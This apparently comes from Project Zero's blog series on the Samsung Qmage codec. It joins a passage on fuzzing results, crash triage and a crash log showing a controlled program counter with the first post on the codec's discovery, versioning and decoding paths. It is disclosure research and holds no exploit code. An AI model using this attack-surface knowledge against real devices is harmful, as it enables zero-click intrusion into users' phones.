In this section, I discuss the results of the "final" fuzzing session I ran in January 2020, which uncovered the bugs reported to Samsung in Project Zero Issue #2002.

Code coverage
In the case of Qmage, it is difficult to precisely measure the percentage coverage of code relative to the overall size of the codec, because it is just one of many parts of the library, and even the codec itself contains unused and non-reachable code segments that shouldn't be included in the calculations. One way to address this problem is to only count functions with non-zero coverage, assuming that there probably aren't any significant routines completely missed by the corpus. By this metric, I have achieved an 87.30% coverage of the Qmage codec. Most importantly, the "heavy" functions responsible for the complex data decoding and decompression are very well covered, with all of them having a coverage rate of >60%, and a great majority being at >80%. The chart below presents the coverage percentage of 34 Qmage functions longer than 4 kB.
In total, they sum up to 26670 basic blocks, 23069 of which are covered (86.50%).

On one hand, these rates can be considered a success, but on the other, they may also indicate that 13% of bugs in the code never had a chance to be triggered and are still waiting to be uncovered. That is unless Samsung and/or Quramsoft have since started doing variant analysis or fuzzing of their own, which is easier and more effective with source code access.

Crashes
Counting both the Android 9 fuzzing session and the subsequent Android 10 session, the fuzzer ran for about four weeks between December 2019 and January 2020. During this time, it identified 5218 unique crashes, where the uniqueness was defined by the three top-level stack trace entries. This number is surely bloated by some bugs which trigger with different call stacks, but still, by any standard, this is a huge number of ways to crash a library. I find it likely that the Qmage codec had never been subject to fuzzing or a manual audit before, and the prevalent lack of bound checks may even suggest that the codec was never supposed to be exposed to untrusted inputs.
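To illustrate the uniqueness criterion, here is a minimal Python sketch of bucketing crashes by their three top-level stack trace entries. It is not the triage code used for the fuzzing session; the function names, the crash identifiers and the frame names in the sample data are all hypothetical.

```python
from collections import defaultdict

def crash_signature(frames, depth=3):
    """Build a bucket key from the `depth` top-level stack frames."""
    return tuple(frames[:depth])

def bucket_crashes(crashes, depth=3):
    """Group crash ids by signature; `crashes` maps crash id -> list of frame names."""
    buckets = defaultdict(list)
    for crash_id, frames in crashes.items():
        buckets[crash_signature(frames, depth)].append(crash_id)
    return dict(buckets)

# Hypothetical sample data: the first two crashes differ only in the fourth frame.
crashes = {
    "crash-001": ["memcpy", "decode_a", "decode_frame", "main"],
    "crash-002": ["memcpy", "decode_a", "decode_frame", "fuzz_one"],
    "crash-003": ["memcpy", "decode_b", "decode_frame", "main"],
}
buckets = bucket_crashes(crashes)
```

With this key, the first two sample crashes collapse into one bucket while the third stays separate, which also shows why a single bug reached through different call stacks inflates the count.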
Thanks to the detailed ASAN-like reports accompanying the crashes, it was easy to perform some automated triage and classify them based on the signal type, accessed address, and the instruction causing the exception. I assigned each crash to one of the following categories, sorted by descending severity:
The categorization is highly simplified, but it does give some overview of the types of discovered issues. The "write" crashes are the most severe, because they manifest an attempt to write data to an invalid non-zero address, which is evidence of a memory corruption condition. They are followed by invalid reads of ≥ 8 bytes and crashes in generic memory manipulation functions (memcpy), which may indicate attempts to load pointers from invalid locations, or other problems related to the handling of structures or continuous data blobs. Next we have small invalid reads (1, 2 or 4 bytes), which generally manifest simple out-of-bounds reads of the input buffer, and then "sigabrt" (memory exhaustion and likely non-exploitable stack corruption) and "null-deref" (reads or writes to near-zero addresses), both of which are relatively trivial security threats beyond some DoS attacks.
That said, assessing bugs based on their first invalid memory access is not always reliable. For example, a one-byte overread may be directly followed by a buffer overflow, or a four-byte invalid access may manifest a use-after-free condition, which is much more serious than any random out-of-bounds buffer read. And even correctly interpreting the crash reports was no trivial feat; as I noticed shortly after reporting Issue #2002, some crashes were incorrectly classified as "null-deref" even though they were caused by attempted reads of completely invalid, non-canonical addresses. The reason is that when such a wild address is accessed, the siginfo_t.si_addr field received by the signal handler doesn't accurately reflect that address, and instead contains 0x0. This made the ASAN reports look like NULL pointer dereferences and confused my triage script. The solution was to re-analyze the reports by cross-referencing si_addr with the value of the source register, and an update shown in comment #1 was sent to Samsung on the next day.
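The triage logic described above can be sketched roughly as follows. This is an illustrative reconstruction in Python, not the actual script: the near-zero threshold, the parameter names, and the "read-memcpy" and "read-8+" labels are assumptions, while "write", "sigabrt", "null-deref" and "read-1" follow the category names used in this post.

```python
NEAR_ZERO_LIMIT = 0x1000  # assumption: addresses below one page count as "near-zero"

def effective_address(si_addr, register_value):
    """Prefer the source register when si_addr was reported as 0x0 for a wild access."""
    if si_addr == 0 and register_value >= NEAR_ZERO_LIMIT:
        return register_value
    return si_addr

def classify_crash(signal, access, size, si_addr, register_value, in_memcpy=False):
    """Return a coarse category label for a single crash report."""
    if signal == "SIGABRT":
        return "sigabrt"
    address = effective_address(si_addr, register_value)
    if address < NEAR_ZERO_LIMIT:
        return "null-deref"
    if access == "write":
        return "write"
    if in_memcpy:
        return "read-memcpy"   # hypothetical label
    if size >= 8:
        return "read-8+"       # hypothetical label
    return "read-%d" % size

# A one-byte read through a non-canonical pointer, reported with si_addr == 0x0.
wild_read = classify_crash("SIGSEGV", "read", 1, 0x0, 0x4a4a4a4a4a4a4a4a)
```

Without the cross-reference in effective_address, the last example would have been filed under "null-deref", which is the misclassification described above.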
What we can infer from the summary with some certainty is that upwards of 95% of the crashes were not critical, but they were an indictment of the overall quality of the code. Specifically, the fact that there were so many "read-1" issues shows that most of the parsing in the codec is implemented at a one-byte granularity, and that there were few to no bounds checks while reading from the input stream (until May 2020). In absolute numbers, however, the 3.33% of crashes that indicated memory corruption still amounted to a horrendous quantity in my opinion, and it offered a wide selection of options for successful exploitation.
As a last exercise, we can take a peek at the crash counts divided by the Qmage format version:

We can see that a large number of bugs were found in the oldest QMv1 format, however it is not as useful in attacks as the rest, because it is not correctly supported in all contexts on Android. What I find most interesting here is the rising trend in the number of crashes between QG1.0, 1.1 and 2.0, likely correlated with the growing complexity of the codec. In particular, the latest QG2.0 format introduced in Android 10 added as many issues as there had been in 1.0 + 1.1 altogether! And while there was no shortage of vulnerabilities even in Android 9, the new attack surface certainly worked in my favor as a researcher looking to exploit the codec. I'll get ahead of myself and admit that I did use a flaw in the QG2.0 format in my final MMS exploit, which will be discussed in later parts of this series.

What's next?
At this point of the story, it was the beginning of February and I had just reported the crashes to Samsung. I knew that Qmage was a zero-click attack surface reachable through MMS. What's more, I ran some of the samples from the "write" category through the Gallery and My Files apps, to see if any of them would trigger any promising faults. After a few tests, I stumbled upon the following crash in logcat:
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/d2sxx/d2s:10/QP1A.190711.020/N975FXXS1BSLD:user/release-keys'
Revision: '24'
ABI: 'arm64'
Timestamp: 2020-01-24 09:40:57+0100
pid: 31355, tid: 31386, name: thumbnail_threa  >>> <<<
uid: 10088
signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x4a4a4a4a4a4a4a
    x0  0000006ff55dc408  x1  0000006f968eb324  x2  0000000000000001  x3  0000000000000001
    x4  4a4a4a4a4a4a4a4a  x5  0000006f968eb31d  x6  00000000000000b3  x7  00000000000000b3
    x8  0000000000000000  x9  0000000000000001  x10 0000000000000001  x11 0000000000000001
    x12 0000007090d96860  x13 0000000000000001  x14 0000000000000004  x15 0000000000000002
    x16 0000007091463000  x17 0000007090ea2d94  x18 0000006f95d1a000  x19 0000006ff5709800
    x20 00000000ffffffff  x21 0000006ff55dc408  x22 00000000000000b0  x23 0000006f968ed020
    x24 0000000000000001  x25 0000000000000001  x26 0000006f968ed020  x27 0000000000000be5
    x28 0000000000012e9a  x29 0000006f968eb370
    sp  0000006f968eb310  lr  0000007090f5f7f0  pc  004a4a4a4a4a4a4a

backtrace:
      #00 pc 004a4a4a4a4a4a4a  <unknown>
      #01 pc 00000000002e97ec  /system/lib64/ (process_run_dec_check_buffer+92) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #02 pc 00000000002ddb94  /system/lib64/ (QmageRunLengthDecodeCheckBuffer_Rev11454_141008+1320) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]
The file explorer crashed while trying to execute code from an invalid 0x4a4a4a4a4a4a4a address, which was almost conclusive evidence that the vulnerability could be exploited to execute arbitrary code. This gave me an extra motivational boost to try to write an MMS exploit for a Samsung flagship phone with the then-latest firmware build. As someone relatively new to the Android ecosystem, it was a great opportunity for me to get better acquainted with the system's security model, existing mitigations, and the current state of the art of exploitation. In Project Zero, we often take part in such offensive exercises to put ourselves in the attacker's shoes. Our vulnerability research and exploitation development work leads to structural security improvements, and better drives our and the wider security community's defense efforts.
I had previously been able to find answers to most of my questions regarding the history and inner workings of Qmage, but trying to exploit it generated a completely new set of doubts and challenges I had to face. Some of them were familiar to me as a security engineer, but others seemed completely new:
  • Which bug(s) provided the most powerful primitives, while also being relatively easy to understand and work with?
  • What objects in memory could be reliably overwritten, and how could they be used to achieve anything useful?
  • How to remotely bypass Android ASLR in a constrained MMS environment which mostly works as a one-way communication channel?
  • How to keep the Messages app up and running despite triggering repeated crashes?

It took me a few months of experimentation and trial and error to arrive at satisfactory solutions to these problems. In the end, I managed to get all of the moving parts to work together well enough to construct the interaction-less attack. In an attempt to give some structure to the somewhat chaotic process I went through, my next blog post will focus on finding the optimal heap corruption primitive to act as the foundation of any higher-level mechanisms employed by the exploit.
Category: Hacking & Security

MMS Exploit Part 1: Introduction to the Samsung Qmage Codec and Remote Attack Surface

16 July, 2020 - 18:42
Posted by Mateusz Jurczyk, Project Zero
This post is the first of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.
Introduction
In January 2020, I reported a large volume of crashes in a custom Samsung codec called "Qmage", present in all Samsung phones since late 2014 (Android version 4.4.4+). This codec is written in C/C++ code, and is baked deeply into the Skia graphics library, which is in turn the underlying engine used for nearly all graphics operations in the Android OS. In other words, in addition to the well-known formats such as JPEG and PNG, modern Samsung phones also natively support a proprietary Qmage format, typically denoted by the .qmg file extension. It is automatically enabled for all apps which display images, making it a prime target for remote attacks, as sending pictures is the core functionality of some of the most popular mobile apps.
In May 2020, Samsung released patches addressing the crashes (including a number of buffer overflows and other memory corruption issues) for devices that are eligible for receiving security updates. The issues were collectively assigned CVE-2020-8899 and a Samsung-specific SVE-2020-16747. On the day of the security bulletin being released, I derestricted the relevant #2002 tracker entry, and open-sourced my fuzzing harness on GitHub (SkCodecFuzzer). I recommend reading the original report, as it includes a detailed explanation of the then-current state of the codec, my approach to fuzzing it, and the bugs found as a result. It may provide some valuable context to better understand this and other upcoming blog posts in the series, although I will do my best to make them self-contained and easy to understand on their own.
After reporting the bugs, I spent the next few months trying to build a zero-click MMS exploit for one of the flagship phones: Samsung Galaxy Note 10+ running Android 10. For reference, similar attacks against chat apps were shown to be possible on iPhones via iMessage by Samuel Groß and Natalie Silvanovich of Google Project Zero in 2019 (see demo video, and blog posts #1, #2, #3). On the other hand, to my knowledge, no exploitation attempts of this kind have been publicly documented against Android since the Stagefright vulnerabilities disclosed in 2015. To me, this seemed like a great opportunity to deep dive into the state of the exploit mitigations on Android today, and see how they fared against a relatively powerful bug – a heap-based buffer overflow with controlled buffer size, data length and the data itself. In the end, I managed to develop an exploit which remotely bypassed ASLR and obtained a reverse shell on a victim's phone (with the privileges of the SMS/MMS app) with no user interaction required, in around 100 minutes on average. The official recording of an attack demonstration is available here, and below I am presenting a director's cut of the same video, with a soundtrack added for your viewing pleasure. :)

By publishing this and further blog posts in the Qmage series, I am hoping to shed more light on how I found the codec, what I learned about it during reconnaissance and preparation for fuzzing, and finally how I managed to circumvent various Android mitigations and obstacles along the way to write a reliable MMS exploit. Please join me on this ride!

How it started
As is often the case in vulnerability research (in my experience), there was a bit of luck involved in the finding of this attack surface. In late 2019, Project Zero had a hackathon as part of a team bonding activity, with focus on Samsung phones. We chose Samsung phones as they were the most popular mobile devices in Europe in Q2 2019, when we were planning our event. Other results of that event can also be found in the PZ bug tracker – they were centered mostly around the security of Samsung kernel-mode components, and fixed in February 2020. During the hackathon, we used Samsung Galaxy A50 running Android 9 as our test devices, but the rest of this post is written based on the analysis of a newer Note 10+ and Android 10, which were the latest Samsung flagship devices at the time of this research.
When I was looking for potential bug hunting targets (naturally written in native languages, so that memory corruption issues would apply), my first thought was to look for inspiration in the bug tracker and existing reports from the past. There, the following issues reported by Natalie in 2015 immediately caught my eye:

Memory safety issues in image handling, how splendid! Please note the "Q" in the "libQjpeg" library name in some of the titles – without knowing it, this was my first encounter with the third-party Quramsoft software vendor. I dug into the bug descriptions, but I couldn't find any of the mentioned, or modules on the test device. However, when I searched for some function names extracted from these reports, such as QURAMWINK_DecodeJPEG, I found them in three other files under /system/lib64:

If you're wondering how many more libraries with "quram" in their names there are in the directory, there are three more on the Note 10+:

In general, the various Quram libraries used in a specific Samsung Android build are listed in /system/etc/public.libraries-quram.txt. I think it is worth highlighting that Quramsoft has a portfolio of software solutions related to audio, video, images and animations, both for encoding and decoding. Throughout Android's existence (and even before it), Samsung has worked closely with the third-party vendor and included a number of their libraries in their custom builds of the OS, mostly to support and advance built-in apps such as Camera or Gallery. Over the years, these libraries have been evolving, some of them were renamed and removed, while others were refactored and merged, up to the point where it is objectively hard for a member of the public to keep track which Samsung models have what subset of the libraries installed. However, many of them are still present and are used on the latest phones. I hope this helps clear up any confusion as to why I am referencing Quram libraries outside the context of just the Qmage codec.
Back to the story – after a brief analysis, I narrowed my interest down to the library, which was the largest, most imported one, and seemed to implement support for a variety of image formats. I could easily trigger it through Gallery, but I still struggled to reach it through media scanning, something that Natalie used as the attack vector in many of her bugs. I began to investigate how the media scanner worked, starting with platform/frameworks/base/media/java/android/media/ in AOSP, and specifically the scanSingleFile → doScanFile → processImageFile path. Here, we can see that all it really boils down to is the usage of the standard BitmapFactory interface:
private boolean processImageFile(String path) {
    try {
        mBitmapOptions.outWidth = 0;
        mBitmapOptions.outHeight = 0;
        BitmapFactory.decodeFile(path, mBitmapOptions);
        mWidth = mBitmapOptions.outWidth;
        mHeight = mBitmapOptions.outHeight;
        return mWidth > 0 && mHeight > 0;
    } catch (Throwable th) {
        // ignore;
    }
    return false;
}
I later verified that very similar code was used by the MediaScanner service on my test Samsung device; the only difference being extra references to an interface and a related library, which appeared irrelevant to my goal of triggering Quram's custom JPEG decoder.

Discovering Skia and Qmage
Not being very familiar with Android and its graphics subsystem at the time, I wanted to dig even deeper into the stack of abstraction and see the actual image decoding code. To achieve that, I followed the execution path of a few more nested methods, first in Java and then crossing into C++ land: BitmapFactory.decodeFile → decodeStream → decodeStreamInternal → nativeDecodeStream → doDecode. In here, we can finally see the actual logic of decoding an image from a byte stream, first by creating a Skia SkCodec object:
    // Create the codec.
    NinePatchPeeker peeker;
    std::unique_ptr<SkAndroidCodec> codec;
    {
        SkCodec::Result result;
        std::unique_ptr<SkCodec> c = SkCodec::MakeFromStream(std::move(stream), &result, &peeker);

        codec = SkAndroidCodec::MakeFromCodec(std::move(c));
        if (!codec) {
            return nullObjectReturn("SkAndroidCodec::MakeFromCodec returned null");
        }
… and then calling the getAndroidPixels method on it:
    SkCodec::Result result = codec->getAndroidPixels(decodeInfo, decodingBitmap.getPixels(),            decodingBitmap.rowBytes(), &codecOptions);
So, in order to learn what image formats are supported by the interface, we have to look into SkCodec::MakeFromStream. The upstream version of the method can be found on GitHub; there, we can see that depending on macros defined during compilation, the following types of images can be loaded (based mostly on the gDecoderProcs table):
  • png
  • jpeg
  • webp
  • gif
  • ico
  • bmp
  • wbmp
  • heif
  • raw (dng)

This is already a sizable list of formats. We can compare the open-source implementation with the compiled one found on Samsung phones in /system/lib64/, which is where the Skia code lives on Android now (on older systems, it was located in /system/lib64/ When I originally opened the SkCodec::MakeFromStream method in IDA Pro, I saw an unrolled loop iterating over the standard Skia codecs, but also a few extra file signature checks, namely:
if ( png_sig_cmp(header, 0LL, length) && (!length || *(_DWORD *)header != 'OIP\x89') )
{
  if ( header[0] == 'Q' && header[1] == 'G' )
  {
    if ( QuramQmageDecVersionCheck(header) )
    {
      // ...
    }
    __android_log_print(6LL, "Qmage", "%s : stream is not a Qmage file\n", "IsQmg");
  }
  if ( header[0] == 'Q' && header[1] == 'M' )
  {
    if ( QuramQmageDecVersionCheck_Rev8253_140615(header) )
    {
      // ...
    }
    __android_log_print(6LL, "Qmage", "%s : stream_Rev8253_140615 is not a Qmage file\n", "IsQM");
  }
  else if ( *(_DWORD *)header == 0x5CA1AB13 )
  {
    // ...
  }
There were four additional signatures being checked for:
  1. \x89PIO, an alternative to the standard \x89PNG file magic.
  2. QG, a type of a Qmage file, as indicated by the log string.
  3. QM, another type of a Qmage file.
  4. \x13\xAB\xA1\x5C, magic bytes which represent an Adaptive Scalable Texture Compression (ASTC) image.
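As a quick illustration, the four extra signatures can be recognized with a few lines of Python. This sketch only mirrors the magic values listed above; it does not reproduce the control flow of the Samsung build of SkCodec::MakeFromStream or the subsequent version checks, and the function name and return labels are my own.

```python
import struct

def classify_magic(header: bytes) -> str:
    """Map the leading bytes of a file to one of the extra signatures."""
    if header[:4] == b"\x89PIO":
        return "PIO"
    if header[:2] == b"QG":
        return "Qmage (QG)"
    if header[:2] == b"QM":
        return "Qmage (QM)"
    if header[:4] == b"\x13\xab\xa1\x5c":
        return "ASTC"
    return "unknown"

# The decompiled code compares a little-endian 32-bit load against 0x5CA1AB13,
# which corresponds to the byte sequence 13 AB A1 5C in the file.
astc_dword = struct.unpack("<I", b"\x13\xab\xa1\x5c")[0]
```

The same little-endian reasoning explains why the disassembly shows 'OIP\x89' for a file that starts with \x89PIO.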

After brief analysis, I concluded that PIO and ASTC were not particularly interesting from a security research perspective, and I turned my eyes to Qmage. It looked like the obvious choice, considering that had hundreds of functions containing "quram", "qmage", or other related strings, these routines performed low-level file format parsing, and many of them were extremely long. The codec seemed so complex and so deeply integrated in Android that it got me really intrigued. An additional factor in all this was that I had never heard about it before, and even using Google search wasn't of much help either. In offensive security, this is usually a very strong indicator of an attractive research target, so I had no choice – I had to put my detective cap on and investigate further.

Learning more about the codec
At this stage, I had many questions roaming in my head, and hardly any answers:
  • What is this codec? How does it work?
  • What is the history behind it? How long has it been shipping? Is it present in all Samsung phones?
  • What is its intended use, and where to find samples to start playing with?
  • What is the security posture of the code?

Finding the answers took me many weeks, but for the sake of brevity, I will present an accelerated account of the events, which skips over some periods of confusion and attempts to make sense of the partial information available at the time. :)

Format versioning
So far, we know that there are two possible magic values for Qmage files: QM and QG. If we look deeper into QuramQmageDecVersionCheck → QmageDecCommon_VersionCheck, which is the second part of the header check, we will see the following logic (in C-like pseudocode):
int QmageDecCommon_VersionCheck(unsigned __int8 *data) {

  if ((data[0] | (data[1] << 8)) != 'GQ') {
    debug_QmageDecError = -5;
    return 0;
  }

  if (data[2] > 2 || (data[2] == 2 && data[3] != 0)) {
    debug_QmageDecError = -5;
    return 0;
  }

  return 1;
}
The function verifies the QG signature again, and then treats the next two bytes as the version identifier. If we assume that data[2] and data[3] are major and minor version numbers respectively, then according to the code above, versions ≤ 2.0 are supported. In fact, this is a really permissive way of implementing the check, because it allows through a number of versions that don't really exist. At the time of this writing, I already know that there are three actual valid versions of the QG format:
  • QG 1.0
  • QG 1.1
  • QG 2.0

Other combinations of major/minor versions (such as 1.231) are either ignored by the codec, or resolve to one of the three above.
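To make the permissiveness of the check concrete, here is a small Python transcription of the pseudocode above. It is a sketch for experimentation only: the function name is mine, and the length check is an addition that the decompiled routine does not have.

```python
def qg_version_check(data: bytes) -> bool:
    """Python rendering of the QG header version check shown above."""
    if len(data) < 4:          # assumption: added so the sketch is safe on short input
        return False
    if data[0:2] != b"QG":     # same as (data[0] | data[1] << 8) == 'GQ'
        return False
    major, minor = data[2], data[3]
    if major > 2 or (major == 2 and minor != 0):
        return False
    return True

# Headers that pass even though no such format version exists.
accepted_oddities = [v for v in (b"QG\x00\x05", b"QG\x01\x02", b"QG\x01\xe7")
                     if qg_version_check(v)]
```

All three odd headers in the example are accepted, including version 1.231, whereas anything above 2.0 (for instance 2.1) is rejected.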
To learn more about the versioning of QM images, we can similarly follow the QuramQmageDecVersionCheck_Rev8253_140615 → QmageDecCommon_VersionCheck_Rev8253_140615 functions in our disassembler, which will lead us to the following logic:
int QmageDecCommon_VersionCheck_Rev8253_140615(unsigned __int8 *data) {

  if (*(unsigned short *)&data[0] == 'MI') {
    if ( data[7] - 90 < 4 )
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'TI' ) {
    if ((data[5] & 0x7F) == 21)
      return 1;
  }
  else if (*(unsigned int *)&data[0] == 'GEFI') {
    if ((data[11] & 0x7F) == 21)
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'WQ') {
    if (data[2] > 0xC)
      return 1;
  }
  else if (*(unsigned int *)&data[0] == '`RFP') {
    if (*(unsigned int*)&data[4] == 0)
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'MQ' && data[2] == 1) {
    return 1;
  }

  debug_QmageDecError = -5;
  return 0;
}
This is definitely more code than expected. We are primarily interested in the last if statement, where we can see that a 0x01 byte is expected to follow the QM magic. Again assuming that this is the version number, we can note down that a version 1 of the QM format is supported by the modern Samsung build of Skia. However, there are also a number of other signatures being checked for: IM, IT, IFEG, QW and PFR. I don't know exactly what formats they represent, and since the above routine can only be reached through a QM header detected in SkCodec::MakeFromStream, the signatures don't really seem to be intentional there. More likely, they are leftover artifacts manifesting file formats parsed by Quramsoft code elsewhere, or got deprecated and aren't in active use anymore at all. We might see these constants again in the future so it's worth keeping them in mind.
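One detail that may be confusing when reading the pseudocode is that the multi-character constants appear reversed relative to the signatures as they occur in a file ('MQ' for QM, 'GEFI' for IFEG). This follows from the values being loaded as little-endian integers. The Python sketch below illustrates the relationship and transcribes only the final QM branch; the helper names are mine.

```python
def multichar_to_file_bytes(constant: str) -> bytes:
    """File-order bytes for a multi-character constant compared to a little-endian load."""
    return constant.encode("latin-1")[::-1]

def qm_v1_check(data: bytes) -> bool:
    """Only the last branch of the routine above: QM magic followed by version byte 1."""
    return len(data) >= 3 and data[0:2] == multichar_to_file_bytes("MQ") and data[2] == 1

# Signatures as they would appear at the start of a file.
signatures = [multichar_to_file_bytes(c) for c in ("MI", "TI", "GEFI", "WQ", "MQ")]
```

The resulting list reads IM, IT, IFEG, QW and QM, matching the names used in the text.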
In summary, there are four distinct versions of Qmage supported by Skia, in chronological order: QMv1, QG1.0, QG1.1, QG2.0. This is especially self-evident when looking at the list of debug symbols found in For each symbol that has existed in the QMv1 codec all the way to QG2.0, there are now four copies of the given variable/function/etc., for example:

The names without any suffixes represent parts of the code for the latest format (QG 2.0). For each earlier format, there seems to be a fork of the code with all functions, structures, static objects etc. renamed to include a revision number and a second numeric part which looks like a date. If my understanding is correct, that would mean that the cut-off dates for the QMv1, QG1.0 and QG1.1 versions of the format were around June 2014, Oct 2014 and Feb 2015 – a relatively short period of time. The QG2.0 iteration was first seen in January 2020 in Android 10, but being the most recent, it lacks the convenient _RevXXXX_YYMMDD suffix to tell us exactly which revision number it is.
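Assuming the second numeric part of the suffix really is a YYMMDD date (which is my interpretation, not something confirmed by the vendor), the revision and cut-off date can be extracted from symbol names mechanically. A minimal Python sketch, with a hypothetical function name:

```python
import re
from datetime import date

SUFFIX_RE = re.compile(r"_Rev(\d+)_(\d{2})(\d{2})(\d{2})$")

def parse_revision_suffix(symbol: str):
    """Return (revision, date) for a _RevXXXX_YYMMDD suffix, or None if absent."""
    match = SUFFIX_RE.search(symbol)
    if match is None:
        return None
    revision, yy, mm, dd = (int(group) for group in match.groups())
    return revision, date(2000 + yy, mm, dd)  # assumption: two-digit years are 20YY

qm_v1 = parse_revision_suffix("QuramQmageDecVersionCheck_Rev8253_140615")
qg_1_0 = parse_revision_suffix("QmageRunLengthDecodeCheckBuffer_Rev11454_141008")
latest = parse_revision_suffix("QuramQmageDecVersionCheck")
```

Both suffixed symbols come from earlier listings in this post and resolve to 15 June 2014 and 8 October 2014, while the unsuffixed name of the latest codec yields nothing.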
However, there are also other bits and pieces of information regarding the versioning of the codec itself to be found in the precompiled Skia binaries. For example, there is an empty function called QmageDecCommon_QmageVersion_1_11_00 in the current build of Furthermore, there is also an unused QuramQmageGetDecoderVersion function in the library, which prints out some other kind of four-part version number, and the exact build date and time, for example:
void QuramQmageGetDecoderVersion() {
  __android_log_print(ANDROID_LOG_INFO, "QG", "Quram Qmage Decoder Info\n");
  __android_log_print(ANDROID_LOG_INFO, "QG", "Version\t : %d.%d.%d.%d\n", 2, 0, 4, 21541);
  __android_log_print(ANDROID_LOG_INFO, "QG", "Build Date\t : %s %s\n", "Mar 17 2020", "19:18:14");
}
If the version number is represented by four X.Y.Z.R integers, then the X.Y pair denotes the highest version of the QG format that the codec supports (in this case, QG2.0), and R is the revision number of the code. By studying the countless builds of and found in archival Samsung firmwares released over the years, one could create a very accurate record of all the different Qmage compilations ever shipped with Samsung devices. My limited analysis has resulted in the following, undoubtedly incomplete table:
Build Date     Build Time    X    Y    Z    R
Jun 15 2014    QMv1 codec                   8253
Nov 14 2014    20:12:03      1    0    0    10484
Nov 17 2014    16:25:19      1    0    0    10484
Jun 12 2015    19:23:03      1    1    1    14470
Jul 3 2015     20:40:49      1    1    1    14470
Jul 6 2015     11:52:27      1    1    1    14470
Sep 2 2015     16:27:42      1    1    1    14470
Nov 27 2015    20:39:10      1    1    1    14470
Dec 21 2015    18:29:31      1    1    2    14470
May 27 2016    15:57:00      1    1    4    21541
Sep 8 2016     17:42:29      1    1    4    21541
Nov 8 2017     20:52:16      1    1    4    21541
Jan 11 2018    20:31:15      1    1    4    21541
Sep 26 2019    17:06:36      2    0    4    21541
Feb 28 2020    09:26:32      2    0    4    21541
Mar 17 2020    19:18:14      2    0    4    21541
May 28 2020    08:53:20      2    0    4    21541
Based on the above information, we can confirm some of our existing presumptions, and draw new conclusions:
  • The codec's appearance in Skia goes back to around mid-2014.
  • It saw the most activity in development between 2014 and 2016, followed by a few years of relative inactivity, to come back again with a new version 2.0 of the format, first compiled for production use in September 2019.
  • The Z component of the version (4) and the revision number (21541) haven't changed since 2016, limiting our insight into the volume of recent changes in the code base.

For those like me who are interested in small interesting pieces of metadata, there are even more artifacts to be found in the library. For example, there are three copies of the QuramQmageGetDecoderVersion function in on Samsung Android 10 (for each version of the QG format), and there are both 32-bit and 64-bit builds of the shared object in the system, so for one compilation of the Qmage codecs, we get six different timestamps taken during the process. On the example of the build from 26 September 2019:
Version    Bitness    Build timestamp
2.0        32-bit     17:05:08
1.1        32-bit     17:06:16
1.0        32-bit     17:06:17
2.0        64-bit     17:06:36
1.1        64-bit     17:07:45
1.0        64-bit     17:07:46
I don't think there is any information that can be derived from it with full certainty, but I still find it fascinating enough to include here. At the very least, the 2m38s gap between the first and last timestamp gives us a clue as to the extent of complexity of the codec.

Codec size, basic control flow and compression types
When we open up in IDA Pro and start inspecting the Qmage code in compiled form, the above build times may start to make sense. In the few builds of the library that I've tested, the Qmage-related code is placed in one continuous binary blob, which makes it easy to measure its size. For example, in the 26-Sep-2019 build (, the first function in the Qmage-related chunk is QmageDecoderLicenseCheck, and the last one is SetResidualCoeffs_C. The overall code region between them is almost 908 kB in size (!), or around 15% of the overall executable segment in the shared object. In large part, this is due to the QG2.0 codec added in Android 10, which introduces more code duplication (new forks of most Qmage-related functions) and imports a whole new copy of libwebp. But even on Android 9 and the 8-Nov-2017 build, the codec is ~425 kB long.
Below is a list of the 20 longest functions found in Notice how 18/20 of them are related to Qmage:

Let's now move onto the control flow and entry points of the codec. When a Qmage image is loaded through an Android interface such as BitmapFactory, execution ends up in the doDecode function, which then calls SkCodec::MakeFromStream, as discussed above. Then, if the first few bytes match the "QG" signature, execution reaches SkQmgCodec::MakeFromStream and further nested functions for header parsing:
SkQmgCodec::MakeFromStream
└── ParseHeader
    └── QuramQmageDecParseHeader
        ├── QmageDecCommon_ParseHeader
        │   └── QmageDecCommon_QGetDecoderInfo
        └── QmageDecCommon_MakeColorTableExtendIndex
The flow is very similar for the older QMv1 files. This basic parsing is sufficient to extract essential information about the bitmap such as its dimensions, so if the inJustDecodeBounds flag is set in BitmapFactory.Options, the processing of the file ends here. However, even though the header parsing logic is short and simple compared to the full bitmap decoding, I still managed to find memory corruption issues there related to building the color table in memory. So, even processes that only query the bounds of untrusted images, such as the MediaScanner service, were prone to attacks via Qmage. But let's not get ahead of ourselves. If the full bitmap data is requested by the caller (e.g. for an app to display it), execution proceeds to SkQmgCodec::onGetPixels and deeper down:
SkQmgCodec::onGetPixels
└── QuramQmageDecodeFrame
    └── Qmage_WDecodeFrame_Low
        └── _QM_WCodec_decode
            ├── PVcodecDecoderIndex
            ├── PVcodecDecoderGrayScale
            └── PVcodecDecoder
Up until this point, the consecutive functions are mostly simple wrappers over the next nested routines, without much data processing logic involved. This changes with the PVcodecDecoder[...] family, which finally choose the relevant low-level codec and call one of the corresponding long, complex functions which do the heavy lifting, such as PVcodecDecoder_1channel_32bits_NEW or QuramQumageDecoder32bit24bit. The subset of available compression types varies between different versions of Qmage; I have performed a cursory analysis and documented them in the table below. Some of them implement well-known concepts such as Run-Length Encoding (RLE) or zlib inflation, while others (the most complex ones) seem to execute custom, proprietary decompression algorithms.

It's worth noting that even as some of these compression types are no longer found in the most recent version of the codec, they are still present and reachable through the older versions supported on Samsung devices. A minor exception is the QMv1 format, which sometimes fails to load in Skia in certain contexts, probably due to its obsolescence and lack of proper testing on modern devices.
It's also interesting that at this level of abstraction, the QG2.0 format doesn't introduce any new codecs of its own. That doesn't mean that it's only a minor revision compared to QG1.1 – on the contrary, it does bring in a vast amount of new functions, just at a different level of the call hierarchy:
[...]
│
├── QuramQumageDecoder32bit24bit
│   ├── DecodePrediction2dZip
│   ├── DecodePrediction2dZip_1L
│   └── QmageDecodeStreamGet_GMH
│
├── QmageDiffZipDecode
│   └── QmageSubUnCompress
│       └── qme_uncompress
│           └── qme_inflateInit
│           └── qme_inflate
│           └── qme_inflateEnd
│
└── PVcodecDecoder_zip
    ├── Qmage7zUnCompress
    ├── QmageBinUnCompress
